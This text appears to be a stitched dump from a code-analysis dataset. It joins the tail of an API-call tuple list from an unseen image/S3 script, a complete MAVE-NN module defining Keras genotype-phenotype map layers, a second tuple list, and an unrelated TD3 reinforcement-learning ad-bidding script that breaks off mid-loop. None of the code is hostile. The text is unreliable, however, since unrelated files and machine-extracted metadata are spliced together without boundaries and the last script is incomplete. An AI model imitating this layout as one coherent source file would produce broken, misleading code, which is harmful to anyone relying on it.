] | [((78, 96), 'boto3.client', 'boto3.client', (['"""s3"""'], {}), "('s3')\n", (90, 96), False, 'import boto3\n'), ((1731, 1753), 'cv2.resize', 'cv2.resize', (['src', 'dsize'], {}), '(src, dsize)\n', (1741, 1753), False, 'import cv2\n'), ((1825, 1874), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['src', '(3, 3)', 'cv2.BORDER_DEFAULT'], {}), '(src, (3, 3), cv2.BORDER_DEFAULT)\n', (1841, 1874), False, 'import cv2\n'), ((1886, 1926), 'cv2.Sobel', 'cv2.Sobel', (['src', 'cv2.CV_8U', '(1)', '(1)'], {'ksize': '(5)'}), '(src, cv2.CV_8U, 1, 1, ksize=5)\n', (1895, 1926), False, 'import cv2\n'), ((1952, 1974), 'numpy.percentile', 'np.percentile', (['src', '(97)'], {}), '(src, 97)\n', (1965, 1974), True, 'import numpy as np\n'), ((1997, 2052), 'cv2.convertScaleAbs', 'cv2.convertScaleAbs', (['src'], {'alpha': '(250 / top_pixel)', 'beta': '(0)'}), '(src, alpha=250 / top_pixel, beta=0)\n', (2016, 2052), False, 'import cv2\n'), ((2067, 2116), 'cv2.GaussianBlur', 'cv2.GaussianBlur', (['src', '(3, 3)', 'cv2.BORDER_DEFAULT'], {}), '(src, (3, 3), cv2.BORDER_DEFAULT)\n', (2083, 2116), False, 'import cv2\n'), ((2180, 2265), 'cv2.imread', 'cv2.imread', (['"""/opt/python/blackboard/blackboard_wide_2.png"""', 'cv2.IMREAD_GRAYSCALE'], {}), "('/opt/python/blackboard/blackboard_wide_2.png', cv2.IMREAD_GRAYSCALE\n )\n", (2190, 2265), False, 'import cv2\n'), ((4264, 4351), 'cv2.copyMakeBorder', 'cv2.copyMakeBorder', (['bck', 'top', 'bottom', 'left', 'right', 'cv2.BORDER_CONSTANT'], {'value': 'color'}), '(bck, top, bottom, left, right, cv2.BORDER_CONSTANT,\n value=color)\n', (4282, 4351), False, 'import cv2\n'), ((4844, 4889), 'cv2.resize', 'cv2.resize', (['extended', 'scaled_just_photo_dsize'], {}), '(extended, scaled_just_photo_dsize)\n', (4854, 4889), False, 'import cv2\n'), ((401, 454), 'os.listdir', 'os.listdir', (['"""/opt/python/lib/python3.7/site-packages"""'], {}), "('/opt/python/lib/python3.7/site-packages')\n", (411, 454), False, 'import os\n'), ((2585, 2604), 'numpy.uint8', 'np.uint8', (['new_pixel'], {}), '(new_pixel)\n', (2593, 2604), True, 'import numpy as np\n'), ((2903, 2928), 'cv2.imencode', 'cv2.imencode', (['""".jpg"""', 'bck'], {}), "('.jpg', bck)\n", (2915, 2928), False, 'import cv2\n'), ((4931, 4961), 'cv2.imencode', 'cv2.imencode', (['""".jpg"""', 'extended'], {}), "('.jpg', extended)\n", (4943, 4961), False, 'import cv2\n')] |
"""gpmap.py: Defines layers representing G-P maps."""
# Standard imports
import numpy as np
from collections.abc import Iterable
import pdb
# Tensorflow imports
import tensorflow as tf
import tensorflow.keras.backend as K
from tensorflow.keras.initializers import Constant
from tensorflow.keras.layers import Layer, Dense
# MAVE-NN imports
from mavenn.src.error_handling import check, handle_errors
class GPMapLayer(Layer):
"""
Represents a general genotype-phenotype map.
Specific functional forms for G-P maps should be
represented by derived classes of this layer.
"""
@handle_errors
def __init__(self,
L,
C,
theta_regularization,
mask_type=None):
"""Construct layer instance."""
# Set sequence length
self.L = L
# Set alphabet length
self.C = C
# Set regularization contribution
self.theta_regularization = theta_regularization
# Set regularizer
self.regularizer = tf.keras.regularizers.L2(self.theta_regularization)
# Set mask type
self.mask_type = mask_type
# Call superclass constructor
super().__init__()
@handle_errors
def get_config(self):
"""Return configuration dictionary."""
base_config = super(Layer, self).get_config()
return {'L': self.L,
'C': self.C,
'theta_regularization': self.theta_regularization,
**base_config}
@handle_errors
def build(self, input_shape):
"""Build layer."""
super().build(input_shape)
### The following methods must be fully overridden
def call(self, inputs):
"""Process layer input and return output."""
assert False
return np.nan
def set_params(self, **kwargs):
"""Set values of layer parameters."""
assert False
def get_params(self):
"""Get values of layer parameters."""
assert False
return {}
class CustomGPMapLayer(Layer):
"""
Represents a custom genotype-phenotype map
where user has to provide implementation via
a sub-class of this class.
"""
#@handle_errors
def __init__(self):
"""Construct layer instance."""
# Call superclass constructor
super().__init__()
#@handle_errors
def get_config(self):
"""Return configuration dictionary."""
base_config = super(Layer, self).get_config()
return {**base_config}
#@handle_errors
def build(self, input_shape):
"""Build layer."""
super().build(input_shape)
### The following methods must be fully overridden
def call(self, inputs):
"""Process layer input and return output."""
assert False
return np.nan
def set_params(self, **kwargs):
"""Set values of layer parameters."""
assert False
def get_params(self):
"""Get values of layer parameters."""
assert False
return {}
class AdditiveGPMapLayer(GPMapLayer):
"""Represents an additive G-P map."""
@handle_errors
def __init__(self, *args, **kwargs):
"""Construct layer instance."""
super().__init__(*args, **kwargs)
@handle_errors
def build(self, input_shape):
"""Build layer."""
# Define theta_0
self.theta_0 = self.add_weight(name='theta_0',
shape=(1,),
initializer=Constant(0.),
trainable=True,
regularizer=self.regularizer)
# Define theta_lc parameters
theta_lc_shape = (1, self.L, self.C)
theta_lc_init = np.random.randn(*theta_lc_shape)/np.sqrt(self.L)
self.theta_lc = self.add_weight(name='theta_lc',
shape=theta_lc_shape,
initializer=Constant(theta_lc_init),
trainable=True,
regularizer=self.regularizer)
# Call superclass build
super().build(input_shape)
def call(self, x_lc):
"""Process layer input and return output."""
# Shape input
x_lc = tf.reshape(x_lc, [-1, self.L, self.C])
phi = self.theta_0 + \
tf.reshape(K.sum(self.theta_lc * x_lc, axis=[1, 2]),
shape=[-1, 1])
return phi
@handle_errors
def set_params(self, theta_0=None, theta_lc=None):
"""
Set values of layer parameters.
Parameters
----------
theta_0: (float)
theta_lc: (np.ndarray)
Shape (L,C)
Returns
-------
None
"""
# Check theta_0
if theta_0 is not None:
check(isinstance(theta_0, float),
f'type(theta_0)={theta_0}; must be float')
# Check theta_lc
if theta_lc is not None:
check(isinstance(theta_lc, np.ndarray),
f'type(theta_lc)={theta_lc}; must be np.ndarray')
check(theta_lc.size == self.L * self.C,
f'theta_lc.size={repr(theta_lc.size)}; '
f'must be ({self.L * self.C}).')
theta_lc = theta_lc.reshape([1, self.L, self.C])
# Set weight values
self.set_weights([np.array([theta_0]), theta_lc])
@handle_errors
def get_params(self):
"""
Get values of layer parameters.
Parameters
----------
None.
Returns
-------
param_dict: (dict)
Dictionary containing model parameters. Model parameters are
returned as matrices, NOT as individual named parameters, and are
NOT gauge-fixed.
"""
# Get list of weights
param_list = self.get_weights()
# Fill param_dict
param_dict = {}
param_dict['theta_0'] = param_list[0]
param_dict['theta_lc'] = param_list[1].reshape([self.L, self.C])
return param_dict
class PairwiseGPMapLayer(GPMapLayer):
"""Represents a pairwise G-P map."""
@handle_errors
def __init__(self, *args, **kwargs):
"""Construct layer instance."""
super().__init__(*args, **kwargs)
# Set mask type
check(self.mask_type in ['neighbor', 'pairwise'],
f'self.mask_type={repr(self.mask_type)}; must be'
f'one of ["neighbor","pairwise"]')
# Create mask
ls = np.arange(self.L).astype(int)
ls1 = np.tile(ls.reshape([1, self.L, 1, 1, 1]),
[1, 1, self.C, self.L, self.C])
ls2 = np.tile(ls.reshape([1, 1, 1, self.L, 1]),
[1, self.L, self.C, 1, self.C])
if self.mask_type == 'pairwise':
self.mask = (ls2 - ls1 >= 1)
elif self.mask_type == 'neighbor':
self.mask = (ls2 - ls1 == 1)
else:
assert False, "This should not work"
@handle_errors
def get_config(self):
"""Return configuration dictionary."""
base_config = super().get_config()
return {'mask_type': self.mask_type,
**base_config}
@handle_errors
def build(self, input_shape):
"""Build layer."""
# Define theta_0
self.theta_0 = self.add_weight(name='theta_0',
shape=(1,),
initializer=Constant(0.),
trainable=True,
regularizer=self.regularizer)
# Define theta_lc parameters
theta_lc_shape = (1, self.L, self.C)
theta_lc_init = np.random.randn(*theta_lc_shape)/np.sqrt(self.L)
self.theta_lc = self.add_weight(name='theta_lc',
shape=theta_lc_shape,
initializer=Constant(theta_lc_init),
trainable=True,
regularizer=self.regularizer)
# Define theta_lclc parameters
theta_lclc_shape = (1, self.L, self.C, self.L, self.C)
theta_lclc_init = np.random.randn(*theta_lclc_shape)/np.sqrt(self.L**2)
theta_lclc_init *= self.mask
self.theta_lclc = self.add_weight(name='theta_lclc',
shape=theta_lclc_shape,
initializer=Constant(theta_lclc_init),
trainable=True,
regularizer=self.regularizer)
# Call superclass build
super().build(input_shape)
def call(self, x_lc):
"""Process layer input and return output."""
# Compute phi
phi = self.theta_0
phi = phi + tf.reshape(K.sum(self.theta_lc *
tf.reshape(x_lc, [-1, self.L, self.C]),
axis=[1, 2]),
shape=[-1, 1])
phi = phi + tf.reshape(K.sum(self.theta_lclc *
self.mask *
tf.reshape(x_lc,
[-1, self.L, self.C, 1, 1]) *
tf.reshape(x_lc,
[-1, 1, 1, self.L, self.C]),
axis=[1, 2, 3, 4]),
shape=[-1, 1])
return phi
@handle_errors
def set_params(self, theta_0=None, theta_lc=None, theta_lclc=None):
"""
Set values of layer parameters.
Parameters
----------
theta_0: (float)
theta_lc: (np.ndarray)
Shape (L,C)
theta_lclc: (np.ndarray)
Shape (L,C,L,C)
Returns
-------
None
"""
# Check theta_0
if theta_0 is not None:
check(isinstance(theta_0, float),
f'type(theta_0)={theta_0}; must be float')
# Check theta_lc
if theta_lc is not None:
check(isinstance(theta_lc, np.ndarray),
f'type(theta_lc)={theta_lc}; must be np.ndarray')
check(theta_lc.size == self.L * self.C,
f'theta_lc.size={repr(theta_lc.size)}; '
f'must be ({self.L * self.C}).')
theta_lc = theta_lc.reshape([1, self.L, self.C])
# Check theta_lclc
if theta_lclc is not None:
check(isinstance(theta_lclc, np.ndarray),
f'type(theta_lclc)={theta_lclc}; must be np.ndarray')
check(theta_lclc.size == self.L * self.C * self.L * self.C,
f'theta_lclc.size={repr(theta_lclc.size)}; '
f'must be ({self.L * self.C * self.L * self.C}).')
theta_lclc = theta_lclc.reshape([1, self.L, self.C, self.L, self.C])
# Set weight values
self.set_weights([np.array([theta_0]), theta_lc, theta_lclc])
@handle_errors
def get_params(self):
"""
Get values of layer parameters.
Parameters
----------
None.
Returns
-------
param_dict: (dict)
Dictionary containing model parameters. Model parameters are
returned as matrices, NOT as individual named parameters, and are
NOT gauge-fixed.
"""
# Get list of weights
param_list = self.get_weights()
# Fill param_dict
param_dict = {}
param_dict['theta_0'] = param_list[0]
param_dict['theta_lc'] = param_list[1].reshape([self.L, self.C])
masked_theta_lclc = param_list[2]
masked_theta_lclc[~self.mask] = np.nan
param_dict['theta_lclc'] = \
masked_theta_lclc.reshape([self.L, self.C, self.L, self.C])
return param_dict
class MultilayerPerceptronGPMap(GPMapLayer):
"""Represents an MLP G-P map."""
@handle_errors
def __init__(self,
*args,
hidden_layer_sizes=(10, 10, 10),
hidden_layer_activation='relu',
features='additive',
**kwargs):
# Check and set hidden layer sizes
check(isinstance(hidden_layer_sizes, Iterable),
f'type(hidden_layer_sizes)={type(hidden_layer_sizes)}; '
f'must be Iterable.')
check(all([x >= 1 for x in hidden_layer_sizes]),
f'all elements of hidden_layer_sizes={hidden_layer_sizes}'
f'must be >= 1')
check(all([isinstance(x, int) for x in hidden_layer_sizes]),
f'all elements of hidden_layer_sizes={hidden_layer_sizes}'
f'must be int.')
self.hidden_layer_sizes = hidden_layer_sizes
# Check and set features
allowed_features = ['additive','neighbor','pairwise']
check(features in allowed_features,
f'features={repr(features)}; must be one of {allowed_features}.')
self.features = features
# Initialize array to hold layers
self.layers = []
# Set activation
self.hidden_layer_activation = hidden_layer_activation
super().__init__(*args, **kwargs)
@handle_errors
def build(self, input_shape):
# Determine input shape
L = self.L
C = self.C
if self.features == 'additive':
self.num_features = L*C
elif self.features == 'neighbor':
self.num_features = L*C + (L-1)*(C**2)
elif self.features == 'pairwise':
self.num_features = L*C + L*(L-1)*(C**2)/2
self.x_shape = (input_shape[0], int(self.num_features))
# Create mask
ls = np.arange(self.L).astype(int)
ls1 = np.tile(ls.reshape([L, 1, 1, 1]),
[1, C, L, C])
ls2 = np.tile(ls.reshape([1, 1, L, 1]),
[L, C, 1, C])
if self.features in ['neighbor', 'pairwise']:
if self.features == 'pairwise':
mask_lclc = (ls2 - ls1 >= 1)
else:
mask_lclc = (ls2 - ls1 == 1)
mask_vec = np.reshape(mask_lclc, L*C*L*C)
self.mask_ints = np.arange(L*C*L*C, dtype=int)[mask_vec]
elif self.features == 'additive':
self.mask_ints = None
else:
assert False, "This should not work"
# Make sure self.layers is empty
self.layers = []
if len(self.hidden_layer_sizes) >= 1:
# Add hidden layer #1
size = self.hidden_layer_sizes[0]
self.layers.append(
Dense(units=size,
activation=self.hidden_layer_activation,
input_shape=self.x_shape,
kernel_regularizer=self.regularizer,
bias_regularizer=self.regularizer)
)
# Add rest of hidden layers
for size in self.hidden_layer_sizes[1:]:
self.layers.append(
Dense(units=size,
activation=self.hidden_layer_activation,
kernel_regularizer=self.regularizer,
bias_regularizer=self.regularizer)
)
# Add output layer
self.layers.append(
Dense(units=1,
activation='linear',
kernel_regularizer=self.regularizer,
bias_regularizer=self.regularizer)
)
elif len(self.hidden_layer_sizes) == 0:
# Add single layer; no hidden nodes
self.layers.append(
Dense(units=1,
activation='linear',
input_shape=self.x_shape,
kernel_regularizer=self.regularizer,
bias_regularizer=self.regularizer)
)
else:
assert False, 'This should not happen.'
# Build superclass
super().build(input_shape)
def call(self, x_add):
"""Process layer input and return output."""
# Create input features
if self.features == 'additive':
tensor = x_add
elif self.features in ['neighbor', 'pairwise']:
L = self.L
C = self.C
x___lc = tf.reshape(x_add, [-1, 1, 1, L, C])
x_lc__ = tf.reshape(x_add, [-1, L, C, 1, 1])
x_lclc = x___lc * x_lc__
x_pair = tf.reshape(x_lclc, [-1, L*C*L*C])
# Only use relevant columns
x_2pt = tf.gather(x_pair, self.mask_ints, axis=1)
# Make input tensor
tensor = tf.concat([x_add, x_2pt], axis=1)
# Run tensor through layers
for layer in self.layers:
tensor = layer(tensor)
phi = tensor
return phi
@handle_errors
def set_params(self, theta_0=None, theta_lc=None):
"""
Does nothing for MultilayerPerceptronGPMap
"""
print('Warning: MultilayerPerceptronGPMap.set_params() does nothing.')
@handle_errors
def get_params(self):
"""
Get values of layer parameters.
Parameters
----------
None.
Returns
-------
param_dict: (dict)
Dictionary containing model parameters.
"""
# Fill param_dict
param_dict = {}
param_dict['theta_mlp'] = [layer.get_weights() for layer in self.layers]
return param_dict
| [
"tensorflow.keras.backend.sum",
"numpy.random.randn",
"tensorflow.keras.layers.Dense",
"tensorflow.gather",
"tensorflow.reshape",
"tensorflow.concat",
"tensorflow.keras.regularizers.L2",
"numpy.array",
"numpy.reshape",
"tensorflow.keras.initializers.Constant",
"numpy.arange",
"numpy.sqrt"
] | [((1045, 1096), 'tensorflow.keras.regularizers.L2', 'tf.keras.regularizers.L2', (['self.theta_regularization'], {}), '(self.theta_regularization)\n', (1069, 1096), True, 'import tensorflow as tf\n'), ((4346, 4384), 'tensorflow.reshape', 'tf.reshape', (['x_lc', '[-1, self.L, self.C]'], {}), '(x_lc, [-1, self.L, self.C])\n', (4356, 4384), True, 'import tensorflow as tf\n'), ((3791, 3823), 'numpy.random.randn', 'np.random.randn', (['*theta_lc_shape'], {}), '(*theta_lc_shape)\n', (3806, 3823), True, 'import numpy as np\n'), ((3824, 3839), 'numpy.sqrt', 'np.sqrt', (['self.L'], {}), '(self.L)\n', (3831, 3839), True, 'import numpy as np\n'), ((7829, 7861), 'numpy.random.randn', 'np.random.randn', (['*theta_lc_shape'], {}), '(*theta_lc_shape)\n', (7844, 7861), True, 'import numpy as np\n'), ((7862, 7877), 'numpy.sqrt', 'np.sqrt', (['self.L'], {}), '(self.L)\n', (7869, 7877), True, 'import numpy as np\n'), ((8329, 8363), 'numpy.random.randn', 'np.random.randn', (['*theta_lclc_shape'], {}), '(*theta_lclc_shape)\n', (8344, 8363), True, 'import numpy as np\n'), ((8364, 8384), 'numpy.sqrt', 'np.sqrt', (['(self.L ** 2)'], {}), '(self.L ** 2)\n', (8371, 8384), True, 'import numpy as np\n'), ((14355, 14391), 'numpy.reshape', 'np.reshape', (['mask_lclc', '(L * C * L * C)'], {}), '(mask_lclc, L * C * L * C)\n', (14365, 14391), True, 'import numpy as np\n'), ((3546, 3559), 'tensorflow.keras.initializers.Constant', 'Constant', (['(0.0)'], {}), '(0.0)\n', (3554, 3559), False, 'from tensorflow.keras.initializers import Constant\n'), ((4011, 4034), 'tensorflow.keras.initializers.Constant', 'Constant', (['theta_lc_init'], {}), '(theta_lc_init)\n', (4019, 4034), False, 'from tensorflow.keras.initializers import Constant\n'), ((4442, 4482), 'tensorflow.keras.backend.sum', 'K.sum', (['(self.theta_lc * x_lc)'], {'axis': '[1, 2]'}), '(self.theta_lc * x_lc, axis=[1, 2])\n', (4447, 4482), True, 'import tensorflow.keras.backend as K\n'), ((5471, 5490), 'numpy.array', 'np.array', (['[theta_0]'], {}), '([theta_0])\n', (5479, 5490), True, 'import numpy as np\n'), ((6630, 6647), 'numpy.arange', 'np.arange', (['self.L'], {}), '(self.L)\n', (6639, 6647), True, 'import numpy as np\n'), ((7584, 7597), 'tensorflow.keras.initializers.Constant', 'Constant', (['(0.0)'], {}), '(0.0)\n', (7592, 7597), False, 'from tensorflow.keras.initializers import Constant\n'), ((8049, 8072), 'tensorflow.keras.initializers.Constant', 'Constant', (['theta_lc_init'], {}), '(theta_lc_init)\n', (8057, 8072), False, 'from tensorflow.keras.initializers import Constant\n'), ((8601, 8626), 'tensorflow.keras.initializers.Constant', 'Constant', (['theta_lclc_init'], {}), '(theta_lclc_init)\n', (8609, 8626), False, 'from tensorflow.keras.initializers import Constant\n'), ((11140, 11159), 'numpy.array', 'np.array', (['[theta_0]'], {}), '([theta_0])\n', (11148, 11159), True, 'import numpy as np\n'), ((13906, 13923), 'numpy.arange', 'np.arange', (['self.L'], {}), '(self.L)\n', (13915, 13923), True, 'import numpy as np\n'), ((14415, 14450), 'numpy.arange', 'np.arange', (['(L * C * L * C)'], {'dtype': 'int'}), '(L * C * L * C, dtype=int)\n', (14424, 14450), True, 'import numpy as np\n'), ((14836, 15002), 'tensorflow.keras.layers.Dense', 'Dense', ([], {'units': 'size', 'activation': 'self.hidden_layer_activation', 'input_shape': 'self.x_shape', 'kernel_regularizer': 'self.regularizer', 'bias_regularizer': 'self.regularizer'}), '(units=size, activation=self.hidden_layer_activation, input_shape=self\n .x_shape, kernel_regularizer=self.regularizer, bias_regularizer=self.\n regularizer)\n', (14841, 15002), False, 'from tensorflow.keras.layers import Layer, Dense\n'), ((15552, 15663), 'tensorflow.keras.layers.Dense', 'Dense', ([], {'units': '(1)', 'activation': '"""linear"""', 'kernel_regularizer': 'self.regularizer', 'bias_regularizer': 'self.regularizer'}), "(units=1, activation='linear', kernel_regularizer=self.regularizer,\n bias_regularizer=self.regularizer)\n", (15557, 15663), False, 'from tensorflow.keras.layers import Layer, Dense\n'), ((16553, 16588), 'tensorflow.reshape', 'tf.reshape', (['x_add', '[-1, 1, 1, L, C]'], {}), '(x_add, [-1, 1, 1, L, C])\n', (16563, 16588), True, 'import tensorflow as tf\n'), ((16610, 16645), 'tensorflow.reshape', 'tf.reshape', (['x_add', '[-1, L, C, 1, 1]'], {}), '(x_add, [-1, L, C, 1, 1])\n', (16620, 16645), True, 'import tensorflow as tf\n'), ((16704, 16743), 'tensorflow.reshape', 'tf.reshape', (['x_lclc', '[-1, L * C * L * C]'], {}), '(x_lclc, [-1, L * C * L * C])\n', (16714, 16743), True, 'import tensorflow as tf\n'), ((16799, 16840), 'tensorflow.gather', 'tf.gather', (['x_pair', 'self.mask_ints'], {'axis': '(1)'}), '(x_pair, self.mask_ints, axis=1)\n', (16808, 16840), True, 'import tensorflow as tf\n'), ((16895, 16928), 'tensorflow.concat', 'tf.concat', (['[x_add, x_2pt]'], {'axis': '(1)'}), '([x_add, x_2pt], axis=1)\n', (16904, 16928), True, 'import tensorflow as tf\n'), ((15245, 15379), 'tensorflow.keras.layers.Dense', 'Dense', ([], {'units': 'size', 'activation': 'self.hidden_layer_activation', 'kernel_regularizer': 'self.regularizer', 'bias_regularizer': 'self.regularizer'}), '(units=size, activation=self.hidden_layer_activation,\n kernel_regularizer=self.regularizer, bias_regularizer=self.regularizer)\n', (15250, 15379), False, 'from tensorflow.keras.layers import Layer, Dense\n'), ((15884, 16021), 'tensorflow.keras.layers.Dense', 'Dense', ([], {'units': '(1)', 'activation': '"""linear"""', 'input_shape': 'self.x_shape', 'kernel_regularizer': 'self.regularizer', 'bias_regularizer': 'self.regularizer'}), "(units=1, activation='linear', input_shape=self.x_shape,\n kernel_regularizer=self.regularizer, bias_regularizer=self.regularizer)\n", (15889, 16021), False, 'from tensorflow.keras.layers import Layer, Dense\n'), ((9045, 9083), 'tensorflow.reshape', 'tf.reshape', (['x_lc', '[-1, self.L, self.C]'], {}), '(x_lc, [-1, self.L, self.C])\n', (9055, 9083), True, 'import tensorflow as tf\n'), ((9448, 9492), 'tensorflow.reshape', 'tf.reshape', (['x_lc', '[-1, 1, 1, self.L, self.C]'], {}), '(x_lc, [-1, 1, 1, self.L, self.C])\n', (9458, 9492), True, 'import tensorflow as tf\n'), ((9323, 9367), 'tensorflow.reshape', 'tf.reshape', (['x_lc', '[-1, self.L, self.C, 1, 1]'], {}), '(x_lc, [-1, self.L, self.C, 1, 1])\n', (9333, 9367), True, 'import tensorflow as tf\n')] |
import pandas as pd
import numpy as np
import tqdm
import datetime
import os
import random
import FAB.models.RL_brain_fab as td3
import sklearn.preprocessing as pre
import tqdm
import torch
import torch.nn as nn
import torch.utils.data
from itertools import islice
from FAB.config import config
import logging
import sys
np.seterr(all='raise')
def setup_seed(seed):
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
np.random.seed(seed)
random.seed(seed)
torch.backends.cudnn.deterministic = True
def bidding(bid):
return int(bid if bid <= 300 else 300)
def generate_bid_price(datas):
'''
:param datas: type list
:return:
'''
return np.array(list(map(bidding, datas))).astype(int)
def bid_main(bid_prices, imp_datas, budget):
'''
主要竞标程序
:param bid_prices:
:param imp_datas:
:return:
'''
win_imp_indexs = np.where(bid_prices >= imp_datas[:, 2])[0]
win_imp_datas = imp_datas[win_imp_indexs, :]
win_clks, real_clks, bids, imps, cost = 0, 0, 0, 0, 0
if len(win_imp_datas):
first, last = 0, win_imp_datas.shape[0] - 1
final_index = 0
while first <= last:
mid = first + (last - first) // 2
tmp_sum = np.sum(win_imp_datas[:mid, 2])
if tmp_sum < budget:
first = mid + 1
else:
last_sum = np.sum(win_imp_datas[:mid - 1, 2])
if last_sum <= budget:
final_index = mid - 1
break
else:
last = mid - 1
final_index = final_index if final_index else first
win_clks = np.sum(win_imp_datas[:final_index, 0])
origin_index = win_imp_indexs[final_index - 1]
real_clks = np.sum(imp_datas[:origin_index, 0])
imps = final_index + 1
bids = origin_index + 1
cost = np.sum(win_imp_datas[:final_index, 2])
current_cost = np.sum(win_imp_datas[:final_index, 2])
if len(win_imp_datas[final_index:, :]) > 0:
if current_cost < budget:
budget -= current_cost
final_imps = win_imp_datas[final_index:, :]
lt_budget_indexs = np.where(final_imps[:, 2] <= budget)[0]
final_mprice_lt_budget_imps = final_imps[lt_budget_indexs]
last_win_index = 0
for idx, imp in enumerate(final_mprice_lt_budget_imps):
tmp_mprice = final_mprice_lt_budget_imps[idx, 2]
if budget - tmp_mprice >= 0:
win_clks += final_mprice_lt_budget_imps[idx, 0]
imps += 1
bids += (lt_budget_indexs[idx] - last_win_index + 1)
last_win_index = lt_budget_indexs[idx]
cost += tmp_mprice
budget -= tmp_mprice
else:
break
real_clks += np.sum(final_imps[:last_win_index, 0])
else:
win_clks, real_clks, bids, imps, cost = 0, 0, 0, 0, 0
last_win_index = 0
for idx, imp in enumerate(win_imp_datas):
tmp_mprice = win_imp_datas[idx, 2]
real_clks += win_imp_datas[idx, 0]
if budget - tmp_mprice >= 0:
win_clks += win_imp_datas[idx, 0]
imps += 1
bids += (win_imp_indexs[idx] - last_win_index + 1)
last_win_index = win_imp_indexs[idx]
cost += tmp_mprice
budget -= tmp_mprice
return win_clks, real_clks, bids, imps, cost
def get_model(args, device):
RL_model = td3.TD3_Model(args.neuron_nums,
action_nums=1,
lr_A=args.lr_A,
lr_C=args.lr_C,
memory_size=args.memory_size,
tau=args.tau,
batch_size=args.rl_batch_size,
device=device
)
return RL_model
def get_dataset(args):
data_path = args.data_path + args.dataset_name + args.campaign_id
# clk,ctr,mprice,hour,time_frac
columns = ['clk', 'ctr', 'mprice', 'hour', 'time_frac']
train_data = pd.read_csv(data_path + 'train.bid.' + args.sample_type + '.data')[columns]
test_data = pd.read_csv(data_path + 'test.bid.' + args.sample_type + '.data')[columns]
train_data = train_data[['clk', 'ctr', 'mprice', 'hour']].values.astype(float)
test_data = test_data[['clk', 'ctr', 'mprice', 'hour']].values.astype(float)
ecpc = np.sum(train_data[:, 2]) / np.sum(train_data[:, 0])
origin_ctr = np.sum(train_data[:, 0]) / len(train_data)
avg_mprice = np.sum(train_data[:, 2]) / len(train_data)
return train_data, test_data, ecpc, origin_ctr, avg_mprice
def reward_func(reward_type, fab_clks, hb_clks, fab_cost, hb_cost):
if fab_clks >= hb_clks and fab_cost < hb_cost:
r = 5
elif fab_clks >= hb_clks and fab_cost >= hb_cost:
r = 1
elif fab_clks < hb_clks and fab_cost >= hb_cost:
r = -5
else:
r = -2.5
if reward_type == 'op':
return r / 1000
elif reward_type == 'nop':
return r
elif reward_type == 'nop_2.0':
return fab_clks / 1000
else:
return fab_clks
'''
1458
437520 447493
30309883.0 30297100.0
395.0 356.0
3358
237844 335310
23340047.0 32515709.0
197.0 307.0
3386
412275 392901
32967478.0 31379459.0
344.0 355.0
3427
379524 390398
30918866.0 31654042.0
282.0 313.0
'''
if __name__ == '__main__':
campaign_id = '1458/' # 1458, 3427
args = config.init_parser(campaign_id)
train_data, test_data, ecpc, origin_ctr, avg_mprice = get_dataset(args)
setup_seed(args.seed)
log_dirs = [args.save_log_dir, args.save_log_dir + args.campaign_id]
for log_dir in log_dirs:
if not os.path.exists(log_dir):
os.mkdir(log_dir)
param_dirs = [args.save_param_dir, args.save_param_dir + args.campaign_id]
for param_dir in param_dirs:
if not os.path.exists(param_dir):
os.mkdir(param_dir)
logging.basicConfig(level=logging.DEBUG,
filename=args.save_log_dir + str(args.campaign_id).strip('/') + args.model_name + '_output.log',
datefmt='%Y/%m/%d %H:%M:%S',
format='%(asctime)s - %(name)s - %(levelname)s - %(lineno)d - %(module)s - %(message)s')
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
stream_handler = logging.StreamHandler(sys.stdout)
stream_handler.setLevel(logging.INFO)
logger.addHandler(stream_handler)
submission_path = args.data_path + args.dataset_name + args.campaign_id + args.model_name + '/' # ctr 预测结果存放文件夹位置
if not os.path.exists(submission_path):
os.mkdir(submission_path)
device = torch.device(args.device) # 指定运行设备
logger.info(campaign_id)
logger.info('RL model ' + args.model_name + ' has been training')
logger.info(args)
actions = np.array(list(np.arange(2, 20, 2)) + list(np.arange(20, 100, 5)) + list(np.arange(100, 301, 10)))
rl_model = get_model(args, device)
B = args.budget * args.budget_para[0]
hb_clk_dict = {}
for para in actions:
bid_datas = generate_bid_price(train_data[:, 1] * para / origin_ctr)
res_ = bid_main(bid_datas, train_data, B)
hb_clk_dict.setdefault(para, res_[0])
hb_base = sorted(hb_clk_dict.items(), key=lambda x: x[1])[-1][0]
train_losses = []
logger.info('para:{}, budget:{}, base bid: {}'.format(args.budget_para[0], B, hb_base))
logger.info('\tclks\treal_clks\tbids\timps\tcost')
start_time = datetime.datetime.now()
clk_index, ctr_index, mprice_index, hour_index = 0, 1, 2, 3
ep_train_records = []
ep_test_records = []
ep_test_actions = []
for ep in range(args.episodes):
if ep % 10 == 0:
test_records = [0, 0, 0, 0, 0]
tmp_test_state = [1, 0, 0, 0]
init_test_state = [1, 0, 0, 0]
test_actions = [0 for _ in range(24)]
test_rewards = 0
budget = B
hour_t = 0
for t in range(24):
if budget > 0:
hour_datas = test_data[test_data[:, hour_index] == t]
state = torch.tensor(init_test_state).float() if not t else torch.tensor(tmp_test_state).float()
action = rl_model.choose_action(state.unsqueeze(0))[0, 0].item()
test_actions[t] = action
bid_datas = generate_bid_price((hour_datas[:, ctr_index] * hb_base / origin_ctr) / (1 + action))
res_ = bid_main(bid_datas, hour_datas, budget)
# win_clks, real_clks, bids, imps, cost
test_records = [test_records[i] + res_[i] for i in range(len(test_records))]
budget -= res_[-1]
hb_bid_datas = generate_bid_price(hour_datas[:, ctr_index] * hb_base / origin_ctr)
res_hb = bid_main(hb_bid_datas, hour_datas, budget)
r_t = reward_func(args.reward_type, res_[0], res_hb[0], res_[3], res_hb[3])
test_rewards += r_t
left_hour_ratio = (23 - t) / 23 if t <= 23 else 0
# avg_budget_ratio, cost_ratio, ctr, win_rate
next_state = [(budget / B) / left_hour_ratio if left_hour_ratio else (budget / B),
res_[4] / B,
res_[0] / res_[3] if res_[3] else 0,
res_[3] / res_[2] if res_[2] else 0]
tmp_test_state = next_state
hour_t += 1
ep_test_records.append([ep] + test_records + [test_rewards])
ep_test_actions.append(test_actions)
print(ep, 'test', test_records, test_rewards)
budget = B
tmp_state = [1, 0, 0, 0]
init_state = [1, 0, 0, 0]
train_records = [0, 0, 0, 0, 0]
# win_clks, real_clks, bids, imps, cost
# win_clks, real_clks, bids, imps, cost = 0, 0, 0, 0, 0
critic_loss = 0
done = 0
for t in range(24):
if budget > 0:
hour_datas = train_data[train_data[:, hour_index] == t]
state = torch.tensor(init_state).float() if not t else torch.tensor(tmp_state).float()
action = rl_model.choose_action(state.unsqueeze(0))[0, 0].item()
